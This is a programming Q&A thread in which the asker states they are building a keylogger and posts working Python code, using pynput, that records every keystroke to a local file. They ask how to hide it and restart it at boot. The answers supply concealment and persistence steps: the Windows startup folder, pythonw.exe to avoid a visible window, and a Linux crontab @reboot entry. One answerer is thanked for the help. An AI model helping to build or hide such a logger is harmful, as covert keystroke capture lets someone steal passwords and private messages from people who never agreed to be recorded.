# How to run a Python program entirely in the background

Tags: python-3.x, linux, windows, macos

I'm trying to make a Keylogger in Python3 but I don't know how to make it run in background and restart it when the PC restarts. It would be perfect if there was a way to make it run in Linux, Windows and Mac but I know it's difficult. I'll highly appreciate any answer.

```
from pynput import keyboard

def on_press(key):
    with open("keys.txt", "a") as f:
        try:
            f.write(f" {str(key.char)} ") 
        except:
            lst_key = list(str(key))
            len_key = 0
            clean_key = [""]
            sp_key = ""
            for i in range(4):
                lst_key.pop(0)
            for i in lst_key:
                len_key = len_key + 1
            for i in range(len_key):
                sp_key = sp_key + lst_key[i]
            f.write(f" {sp_key} ")
            f.close()

with keyboard.Listener(
        on_press=on_press) as listener:
    listener.join()
```

Answer (score 0):

Although I may be very new to learning Python, so there may be more ways to do it, but you can:

1. put the file in your startup folder/directory
2. use pythonw.exe (included with python, as far as I know) to run the script without opening a terminal [I think you  use cmd for this ]
3. make sure the program doesn't auto-close itself when you don't want it to

hope it helped
Bonus:
there are also pre-made apps that can play your python scripts whenever you want (even when the pc is booted up), you can check those out if you want to.

Comment: Thanks for the solution it worked perfectly I'll publish the final code on Github I could give credits if you want

Comment: nah, no need
glad to help

Answer (score 0):

For Linux, you can use crontab to automate your task (that is, your python script). You need to make your python script executable using `chmod +x`,
and use `crontab -e` to add task. Use `@reboot` to run the script once on reboot.

This is my example using python script of path `/home/myuser/Desktop/python_sandbox/yourtask.py`

1. make python script executable

   ```
   chmod +x /home/myuser/Desktop/python_sandbox/yourtask.py
   ```
2. edit crontab task

   ```
   crontab -e
   ```

   select whatever text editor that you are comfortable with (I use vim)
3. add your python script by adding this line after entering `crontab -e`:

   ```
   @reboot python3 /home/myuser/Desktop/python_sandbox/yourtask.py
   ```
4. save and quit the editor (I use vim, so it is `:wq`) and you are done.

Comment: Thanks, but I couldn't ran it on linux